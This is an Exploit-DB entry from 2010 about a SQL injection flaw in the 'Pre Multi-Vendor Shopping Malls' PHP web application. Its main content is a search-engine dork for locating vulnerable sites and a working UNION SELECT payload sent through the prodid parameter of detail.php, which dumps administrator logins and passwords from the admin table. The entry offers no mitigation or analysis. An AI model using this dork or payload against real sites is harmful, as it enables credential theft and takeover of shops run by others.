Pre Multi-Vendor Shopping Malls SQL Injection Vulnerability

2010-06-22T00:00:00
ID EDB-ID:13987
Type exploitdb
Reporter Sangteamtham
Modified 2010-06-22T00:00:00

Description

Pre Multi-Vendor Shopping Malls SQL Injection Vulnerability. Webapps exploit for php platform

                                        
                                            #######################################################################
#
# Source: Pre Multi-Vendor Shopping Malls SQL Injection Vulnerability
# Download: http://preproject.com/products.asp
# Dork: inurl:Powered by: PreProjects + detail.php?prodid=694
# Author: Sangteamtham@gmail.com
#
#######################################################################

Exploit :

http://server/detail.php?prodid=999999+UNION SELECT
1,2,3,group_concat(login,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34
from admin

Discovered since Wed, Jul 15, 2009